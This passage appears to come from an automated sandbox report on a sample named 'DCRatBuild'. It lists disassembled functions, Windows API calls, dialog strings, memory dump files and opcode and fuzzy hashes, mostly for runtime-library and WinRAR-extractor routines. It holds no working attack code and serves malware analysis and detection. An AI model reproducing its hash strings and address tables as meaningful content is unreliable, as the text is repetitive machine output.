                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                        • String ID: $%s:$CAPTION$Tv$d
                                        • API String ID: 2407758923-2527556340
                                        • Opcode ID: 2515b8638e17b63e7cbb7c7286c84e89cb424afb37709ce6b9d4e8bad997b580
                                        • Instruction ID: 974217b4630f42f6936c650a2fe6fae94325b0ba56d7bf3301b6658843e20a08
                                        • Opcode Fuzzy Hash: 2515b8638e17b63e7cbb7c7286c84e89cb424afb37709ce6b9d4e8bad997b580
                                        • Instruction Fuzzy Hash: 8181B271108305AFD720DF68DD89E6BBBE9EB88704F04491DFA8593252D778ED0ACB52
                                        Function 0075C233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 0075C277
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE2F
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE41
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE53
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE65
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE77
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE89
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE9B
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BEAD
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BEBF
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BED1
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BEE3
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BEF5
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BF07
                                        • _free.LIBCMT ref: 0075C26C
                                          • Part of subcall function 007584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?), ref: 007584F4
                                          • Part of subcall function 007584DE: GetLastError.KERNEL32(?,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?,?), ref: 00758506
                                        • _free.LIBCMT ref: 0075C28E
                                        • _free.LIBCMT ref: 0075C2A3
                                        • _free.LIBCMT ref: 0075C2AE
                                        • _free.LIBCMT ref: 0075C2D0
                                        • _free.LIBCMT ref: 0075C2E3
                                        • _free.LIBCMT ref: 0075C2F1
                                        • _free.LIBCMT ref: 0075C2FC
                                        • _free.LIBCMT ref: 0075C334
                                        • _free.LIBCMT ref: 0075C33B
                                        • _free.LIBCMT ref: 0075C358
                                        • _free.LIBCMT ref: 0075C370
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID: Pv
                                        • API String ID: 161543041-1445123177
                                        • Opcode ID: d4c1ecbba02d5ac6b30843dddc08717500b0450bb125ec45b2976773178dba2a
                                        • Instruction ID: fa7ac6cb98ec0dab014f952fd2ec1578eee410299e1a9f02c8a53f2ba673437e
                                        • Opcode Fuzzy Hash: d4c1ecbba02d5ac6b30843dddc08717500b0450bb125ec45b2976773178dba2a
                                        • Instruction Fuzzy Hash: 7D315E31500309DFEBA29E78D949BD673E5FF00312F14C429EC89E7551DFB9AC488652
                                        Function 0074CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindow.USER32(?,00000005), ref: 0074CD51
                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 0074CD7D
                                          • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0074CD99
                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0074CDB0
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0074CDC4
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0074CDED
                                        • DeleteObject.GDI32(00000000), ref: 0074CDF4
                                        • GetWindow.USER32(00000000,00000002), ref: 0074CDFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                        • String ID: STATIC
                                        • API String ID: 3820355801-1882779555
                                        • Opcode ID: 74f7322d0fb6032703f830d415b09147576dca28b0907840ee8bdb8ba4fa1ca1
                                        • Instruction ID: 70df980fcaf48df8ca70df9a2f623296ef81c5964b034464185661fdeebd6126
                                        • Opcode Fuzzy Hash: 74f7322d0fb6032703f830d415b09147576dca28b0907840ee8bdb8ba4fa1ca1
                                        • Instruction Fuzzy Hash: 4B11EB32646310BBE2327B749C4EFAF365CAB55751F008521FB42A1093DB6C891786A8
                                        Function 00758EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00758EC5
                                          • Part of subcall function 007584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?), ref: 007584F4
                                          • Part of subcall function 007584DE: GetLastError.KERNEL32(?,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?,?), ref: 00758506
                                        • _free.LIBCMT ref: 00758ED1
                                        • _free.LIBCMT ref: 00758EDC
                                        • _free.LIBCMT ref: 00758EE7
                                        • _free.LIBCMT ref: 00758EF2
                                        • _free.LIBCMT ref: 00758EFD
                                        • _free.LIBCMT ref: 00758F08
                                        • _free.LIBCMT ref: 00758F13
                                        • _free.LIBCMT ref: 00758F1E
                                        • _free.LIBCMT ref: 00758F2C
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: c985204078ce256598c87611ede7a0329dfa7f1b731ca4c9a67cfecab8e325f6
                                        • Instruction ID: 5e4debb76c24ae7ad92be88840894d762c38a272d6cb5676090d4fbe2b736cd9
                                        • Opcode Fuzzy Hash: c985204078ce256598c87611ede7a0329dfa7f1b731ca4c9a67cfecab8e325f6
                                        • Instruction Fuzzy Hash: EC11D47610114DEFCBD1EF54C846DDA3BB5FF08351B0180A0BE48AF622DA76DA559B82
                                        Function 00732162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;%u$x%u$xc%u
                                        • API String ID: 0-2277559157
                                        • Opcode ID: fb565cc976cf151bda2060c7b4d286a47c13c292a2b0a638995f1fd05241014b
                                        • Instruction ID: ec02c0035a030bf749bbac8f1d0f9d759d31561595140e5436a6582daa74d104
                                        • Opcode Fuzzy Hash: fb565cc976cf151bda2060c7b4d286a47c13c292a2b0a638995f1fd05241014b
                                        • Instruction Fuzzy Hash: CCF10771604340DBFB25EF34889ABFE77957F90300F084579F9869B283DA6C9949C7A2
                                        Function 0074ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        • EndDialog.USER32(?,00000001), ref: 0074AD20
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 0074AD47
                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0074AD60
                                        • SetWindowTextW.USER32(?,?), ref: 0074AD71
                                        • GetDlgItem.USER32(?,00000065), ref: 0074AD7A
                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0074AD8E
                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0074ADA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                        • String ID: LICENSEDLG
                                        • API String ID: 3214253823-2177901306
                                        • Opcode ID: 48375d1661b5ebb97badff39f25a21e5541f3fb410691ac93e3d24fd1e3d6068
                                        • Instruction ID: 687f6aa4d4005e2425a8714913824dfb131e129e3b06c854084caa99d8412a5c
                                        • Opcode Fuzzy Hash: 48375d1661b5ebb97badff39f25a21e5541f3fb410691ac93e3d24fd1e3d6068
                                        • Instruction Fuzzy Hash: 2A210732BC0104BBD2216F35EC4EE7B3B6CEB06786F018015F605924A5DB6E5902DB3A
                                        Function 00739443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00739448
                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0073946B
                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0073948A
                                          • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
                                        • _swprintf.LIBCMT ref: 00739526
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                        • MoveFileW.KERNEL32(?,?), ref: 00739595
                                        • MoveFileW.KERNEL32(?,?), ref: 007395D5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                        • String ID: rtmp%d
                                        • API String ID: 2111052971-3303766350
                                        • Opcode ID: 338e866f516a809e167966ab6c95ea6a17f8058ad40cabe487555bb483a00b3d
                                        • Instruction ID: 9778b6866a159d17026aaf8ba3168331d7222296ebdc1aa2de04b7d2e0f5bed6
                                        • Opcode Fuzzy Hash: 338e866f516a809e167966ab6c95ea6a17f8058ad40cabe487555bb483a00b3d
                                        • Instruction Fuzzy Hash: 10412F71901259F6EF30EB608C89ADA737CAF55380F0444E5B649E3143EBBC9B89CB65
                                        Function 00748E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00748F38
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00748F59
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00748F80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Global$AllocByteCharCreateMultiStreamWide
                                        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                        • API String ID: 4094277203-4209811716
                                        • Opcode ID: 9398480353c8e4b7056405b7a1361a523a740efb226512037980a824a991c4ad
                                        • Instruction ID: 18c1110937fbef3fd959a430991fea2b15376652dd934f1111039d68a29c97ba
                                        • Opcode Fuzzy Hash: 9398480353c8e4b7056405b7a1361a523a740efb226512037980a824a991c4ad
                                        • Instruction Fuzzy Hash: 50314A31508319BBD724AB309C06FAF7798DF82760F044019FD12961D1EFAC9A0DC3A6
                                        Function 00758FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,00770EE8,00753E14,00770EE8,?,?,00753713,00000050,?,00770EE8,00000200), ref: 00758FA9
                                        • _free.LIBCMT ref: 00758FDC
                                        • _free.LIBCMT ref: 00759004
                                        • SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 00759011
                                        • SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 0075901D
                                        • _abort.LIBCMT ref: 00759023
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID: Xv
                                        • API String ID: 3160817290-1716690856
                                        • Opcode ID: f29c8893ca22f0b2a9346b5e2672e0df8f6f75ef98c8c94853943868ad414946
                                        • Instruction ID: d24e9442e4828dc0740424d1b69f7b1736fd82a23a76145877a4eee69cf9109b
                                        • Opcode Fuzzy Hash: f29c8893ca22f0b2a9346b5e2672e0df8f6f75ef98c8c94853943868ad414946
                                        • Instruction Fuzzy Hash: D1F04935104601EBC39133286C0EBEB29169BD0333F204114FD06F61D2EFEC880E5066
                                        Function 00740A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __aulldiv.LIBCMT ref: 00740A9D
                                          • Part of subcall function 0073ACF5: GetVersionExW.KERNEL32(?), ref: 0073AD1A
                                        • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00740AC0
                                        • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00740AD2
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00740AE3
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00740AF3
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00740B03
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00740B3D
                                        • __aullrem.LIBCMT ref: 00740BCB
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                        • String ID:
                                        • API String ID: 1247370737-0
                                        • Opcode ID: adef66de76f3f0e95edd83a2fbdf322c2c7b9e1a22f9b51fc1e1f8f652c1c614
                                        • Instruction ID: 08f6a137060f83c01641aad02f1f425fe0a387e479e4970262522069ce04db3f
                                        • Opcode Fuzzy Hash: adef66de76f3f0e95edd83a2fbdf322c2c7b9e1a22f9b51fc1e1f8f652c1c614
                                        • Instruction Fuzzy Hash: 5E414AB1408306AFC314DF64C88496BF7F8FB88714F104A2EFA9692650E778E548CB66
                                        Function 0075EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0075F5A2,?,00000000,?,00000000,00000000), ref: 0075EE6F
                                        • __fassign.LIBCMT ref: 0075EEEA
                                        • __fassign.LIBCMT ref: 0075EF05
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0075EF2B
                                        • WriteFile.KERNEL32(?,?,00000000,0075F5A2,00000000,?,?,?,?,?,?,?,?,?,0075F5A2,?), ref: 0075EF4A
                                        • WriteFile.KERNEL32(?,?,00000001,0075F5A2,00000000,?,?,?,?,?,?,?,?,?,0075F5A2,?), ref: 0075EF83
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 7b72867ec5fbc7413a9e4b5983aa465a40c236b08474d19fa5875c74d58f0650
                                        • Instruction ID: c5c8e298f8a6b18204d5af8508b9d6233f9c9f5bbb0e593c302203fd0a7e2384
                                        • Opcode Fuzzy Hash: 7b72867ec5fbc7413a9e4b5983aa465a40c236b08474d19fa5875c74d58f0650
                                        • Instruction Fuzzy Hash: FA5108B0A00209DFDB14CFA8DC45AEEBBF9FF08301F14451AE955E7291EBB49A45CB64
                                        Function 0074C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000800,?), ref: 0074C54A
                                        • _swprintf.LIBCMT ref: 0074C57E
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                        • SetDlgItemTextW.USER32(?,00000066,0077946A), ref: 0074C59E
                                        • _wcschr.LIBVCRUNTIME ref: 0074C5D1
                                        • EndDialog.USER32(?,00000001), ref: 0074C6B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                        • String ID: %s%s%u
                                        • API String ID: 2892007947-1360425832
                                        • Opcode ID: b78ad367cce8b74e8a2d9770de973b5288fe2e0ce2f1210bf5cb6bc44ed9bf4a
                                        • Instruction ID: 25438177c7370ff8fa140e1a4b240e1738753519e3f75141f5891fbeb72780ac
                                        • Opcode Fuzzy Hash: b78ad367cce8b74e8a2d9770de973b5288fe2e0ce2f1210bf5cb6bc44ed9bf4a
                                        • Instruction Fuzzy Hash: 0241A3B1D00658FADF26DBA4CC49EDA77BCEB08345F0080A6E609E6061E7799BC4CB55
                                        Function 00749635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(?,00000000), ref: 0074964E
                                        • GetWindowRect.USER32(?,00000000), ref: 00749693
                                        • ShowWindow.USER32(?,00000005,00000000), ref: 0074972A
                                        • SetWindowTextW.USER32(?,00000000), ref: 00749732
                                        • ShowWindow.USER32(00000000,00000005), ref: 00749748
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Window$Show$RectText
                                        • String ID: RarHtmlClassName
                                        • API String ID: 3937224194-1658105358
                                        • Opcode ID: bd215700ccec2cfbc0ad088c2ca060195312e976ae2d1720794e0fb2bccc58ce
                                        • Instruction ID: e0eade996c4d0ea6961e9c01e2e01faefaf803b448c6ef7bfdb39260117f0fb7
                                        • Opcode Fuzzy Hash: bd215700ccec2cfbc0ad088c2ca060195312e976ae2d1720794e0fb2bccc58ce
                                        • Instruction Fuzzy Hash: 4531BF31044208FFCB11AF64DC4CB6B7BA8EF48311F01855AFE499A163DB38D816CBA9
                                        Function 0075BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0075BF79: _free.LIBCMT ref: 0075BFA2
                                        • _free.LIBCMT ref: 0075C003
                                          • Part of subcall function 007584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?), ref: 007584F4
                                          • Part of subcall function 007584DE: GetLastError.KERNEL32(?,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?,?), ref: 00758506
                                        • _free.LIBCMT ref: 0075C00E
                                        • _free.LIBCMT ref: 0075C019
                                        • _free.LIBCMT ref: 0075C06D
                                        • _free.LIBCMT ref: 0075C078
                                        • _free.LIBCMT ref: 0075C083
                                        • _free.LIBCMT ref: 0075C08E
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
